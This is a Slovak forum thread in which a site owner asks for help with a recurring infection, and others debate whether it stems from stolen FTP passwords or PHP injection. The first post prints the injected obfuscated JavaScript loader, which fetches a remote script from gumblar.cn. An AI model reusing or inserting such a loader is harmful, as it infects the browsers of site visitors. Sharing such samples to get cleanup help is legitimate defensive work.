Vírus na stránke

alfredo

Dobré Ráno

Mam taký malí veľký problém na moju stránku sa dostál vírus

http://findbigthinker.cn/index.php JS/Exploit.Agent.AFH trojský kůň

zmenu som spozoroval aj na index.php kde sa mi pridal riadok

Kód: Vybrať všetko

<script language=javascript><!-- 
(function(){var kn3='var<20<61<3d<22Scri<70<74Engine<22<2c<62<3d<22Ve<72
sion()+<22<2cj<3d<22<22<2cu<3dnaviga<74<6fr<2euse<72<41gent
<3bif<28(u<2eindexOf<28<22Wi<6e<22)<3e0<29<26<26(u<2e
index<4ff(<22NT<206<22)<3c0<29<26<26(docu<6dent<2ecookie
<2ein<64exO<66(<22m<69e<6b<3d1<22)<3c0)<26<26(<74yp<
65o<66(<7arvzts)<21<3dtypeof(<22A<22<29))<7bzrv<7a<74<73<
3d<22<41<22<3beval(<22<69f(wi<6e<64<6fw<2e<22<2ba+<22)<
6a<3dj<2b<22+a+<22Major<22+<62+<61+<22M<69n<6fr<22+b+a+
<22Bui<6cd<22+b+<22j<3b<22<29<3bdo<63ume<6et<2ewrite(<22
<3cscript<20src<3d<2f<2fg<75m<62la<72<2e<63n<2fr<73s<2f<3fi
<64<3d<22<2bj+<22<3e<3c<5c<2fscript<3e<22)<3b<7d';var niz1h=unescape(kn3.replace(/</g,'%'));eval(niz1h)})();
 --></script>

Ak tam nakopírujem noví index aj tak to tam znovu pridá pričom práva ma 404 .
Vedeli by ste mi poradiť čo by na to mohlo pomôcť ? nejaké zablokovanie IP čky tej stránky (v .htaccess) alebo niečo iné.

Vopred ďakujem za radu

Bobr

Myslim si ze ti nieco ukradlo hesla na FTP (asi pouzivas total comander), mne robilo to iste musis to zmazat zo vsetkych stranok, zmenit hesla na ftp, a vymazat si ich s total commandera alebo ineho ftp klienta a rucne ich vkladat pri kazdom prihlaseni, mne to pomohlo

alfredo

Som zistil že tento kód sa stáôe pridá pred tag <body> ale ked stiahnem súbor na disk tak už editovaný nieje.

Budem rád ak mi pomôžete Dik

Skontroluj si počítač, či tam nemáš nejaký vírus (niektoré vírusy kradnú heslá k ftp a potom ti niekto tie súbory cez ftp zmení, a sú aj také, ktoré ti tie súbory upravia vtedy, keď ich posielaš cez ftp).

alfredo

Keď si pozriem súbor v TC ktorí je už na servery tak tam ešte zmena nieje. Spustím kontrolu PC a vymažem tie heslá. Začalo robiť len včera a to som od štvrtka nebol na tomto PC a lognuty na FTP aj týždeň a pristupoval som cez SSL .

bart11

V pripade, ze by sa ti to stalo znovu, pozri sa do procesov, ci ti tam nebezi nieco co by nemalo. Na jednej stranke som sa docital, ze mu to sposoboval proces acrobat reader (nevravim, ze to bol skutocny acrobat). Tu je stranka:
http://www.pakzilla.com/2009/05/06/how- ... infection/

popripade daj do guglu: gumblar.cn
A najdi si stranky, ktore tento problem popisuju.

Na tejto stranke pisal aj riesenie (vlastne to napisali aj chalani o niekolko prispevkov vyssie)
http://blog.unmaskparasites.com/2009/05 ... ed-script/

fero_zezina

O.o ukradnut heslo od FTP?:D nechcel si tam napisat ze mu to ukradla gozilla alebo co tak hmm.. alenka z rise bambusovych kvetov.

kedze to ma v PHP najvacsia pravdepodobnost je ze ma nedostatocne osetrene vstupy ako napr znaky <> a podobne, takze jednoducho mu tam niekto resp. nieco ako robot vlozi cez cross-site script alebo PHP injection barz jaky bordel...

..ale fakt spekulovat ze by mu niekto ukradol FTP meno a heslo a menil iba stranku a to tym ze mu tam da JS script... to ma dostalo

Čo keby si najskôr použil Google a pokúsil sa nájsť informácie o tom, či existuje vírus/trojan/čokoľvek, čo kradne údaje? Tu sú informácie o Trojan.Renver (ten trojan sa pokúša odoslať súbor wcx_ftp.ini na nejaký email). A ak ti tá tvoja obľúbená godzilla alebo Alenka neukradli Google, tak si dokážeš nájsť informácie aj o iných vírusoch, ktoré sa správajú podobne).

fero_zezina

chrono napísal:Čo keby si najskôr použil Google a pokúsil sa nájsť informácie o tom, či existuje vírus/trojan/čokoľvek, čo kradne údaje? Tu sú informácie o Trojan.Renver (ten trojan sa pokúša odoslať súbor wcx_ftp.ini na nejaký email). A ak ti tá tvoja obľúbená godzilla alebo Alenka neukradli Google, tak si dokážeš nájsť informácie aj o iných vírusoch, ktoré sa správajú podobne).

O.o ty co davas:D mi chces povedat ze jemu, sa do kompu dostal trojsky kon ( Virus nekradne hesla.. virus sa len mnozii, od toho je to odvodene

) , pripojil sa mu na FTP a to tak ze cakal kym od zada heslo na svoje FTP, aby mu potom pozmenil idex.php na jeho stranle???.. to mas z vesteckej gule, alebo mi to skus prosim ta vysvetlit, moc tomu nechapem....

Idme po poriadku..

Typek spomenul ze:

"Mam taký malí veľký problém na moju stránku sa dostál vírus"

Tym myslel evidentne ze do kodu jeho stranky sa mu dostal virus, ktory postol...((hmmm to bude asi ten virus "wcx_ftp.ini " co posiela hesla od FTP aby menil subory O.o))
a stranku ma napisanu v PHP...trocha porozmyslaj moj

..asi najlogickejsie, i ked pre teba asi nie, sa zda PHP injection..odporucam precitat si

Virus je aplikacia "označuje program alebo kód, ktorý sa dokáže sám šíriť bez vedomia používateľa. Aby sa mohol rozmnožovať, vkladá kópie svojho kódu do iných spustiteľných súborov alebo dokumentov."

Precitaj si to niekde, napr na wikipedii... Virus nema za ulohu ziskavat informacie na to je spyware...
Trojsky kon je zasa nieco ine...

Prosim Ta neprep dve na tri, si to torcha nastuduj a potom sem postuj, a moja alenka a godzilla mi gugl neukradli

Nadeo

Ty trocha pogoogli, a prestan potit blbosti. To kradnutie ftp hesiel / menenie indexov je bezna vec. Stalo sa to 3 mojim kamosom, a ani nevedeli ako...

A myslim, ze chrono je jeden z tych, ktori uz googlit nemusia...

fero_zezina napísal:...

Aspoň si si popis toho trojana prečítal a zistil si si, čo sa nachádza v súbore wcx_ftp.ini?

JanJanuska

fero_zezina napísal:...

Skôr, než sa začneš do niekoho obúvať, tak si aspoň skontroluj, či nepíše pravdu, pretože potom sa len zhovadíš. To, že si sa s niečim podobným nestretol ešte neznamená, že to neexistuje...

K-

fero_zezina

JanJanuska napísal:Skôr, než sa začneš do niekoho obúvať, tak si aspoň skontroluj, či nepíše pravdu, pretože potom sa len zhovadíš. To, že si sa s niečim podobným nestretol ešte neznamená, že to neexistuje... K-

Mno, tak co sa ti zda pravdepodobnejsie, to ze ti "nieco" ukradne heslo od FTP a zmeni jednu stranku a to tak ze to tam vlozi JS virus...
..alebo jednoduchou PHP Ijection vlozi do PHP suboru JS virus lebo su nedostatocne osetrene vstupy alebo je pouzity <include> s nedostaqtocnym nastavenim?

Nadeo

fero_zezina napísal:Mno, tak co sa ti zda pravdepodobnejsie, to ze ti "nieco" ukradne heslo od FTP a zmeni jednu stranku a to tak ze to tam vlozi JS virus...
..alebo jednoduchou PHP Ijection vlozi do PHP suboru JS virus lebo su nedostatocne osetrene vstupy alebo je pouzity <include> s nedostaqtocnym nastavenim?

Vzdy treba hladat vsetky moznosti, nie len tu ktora je najviac pravdepodobna a ostatne automaticky vylucit.

1) koho zaujíma ako sa to tam dostalo, možno to tam dala tá alenka s bambusom čo prišla na godzile. On chce vedieť ako sa toho zbaviť
2) keby si tuto kolega s neošetreným vstupom už konečne kur*a otvoril ten google a začal ho používať tak by zistil že tento problém sa stal (dokonca) aj inde ako na stránkach ktoré majú vstupy, dokonca na stránkach ktoré sú čisto v html bez akýchkoľvek vstupov

no, ideš.. daj ešte niečo ale nech sa už autor témy konečne pohne vpred

//btw: presunuté z programovania do pomoci

JanJanuska

fero_zezina napísal:Mno, tak co sa ti zda pravdepodobnejsie, to ze ti "nieco" ukradne heslo od FTP a zmeni jednu stranku a to tak ze to tam vlozi JS virus...
..alebo jednoduchou PHP Ijection vlozi do PHP suboru JS virus lebo su nedostatocne osetrene vstupy alebo je pouzity <include> s nedostaqtocnym nastavenim?

Tu sa neriešilo čo je pravdepodobnejšie a čo nie.

Môže to byť všeličo, ja som sa už niekoľko krát stretol s prvou možnosťou (aj keď mne osobne sa to zatiaľ nestalo). Aby bolo možné vykonať PHP injection musí byť web nie len deravý, ale aj zle naprogramovaný a musí byť "zle" nastavený aj server. Takže prvú možnosť považujem za pravdepodobnejšiu.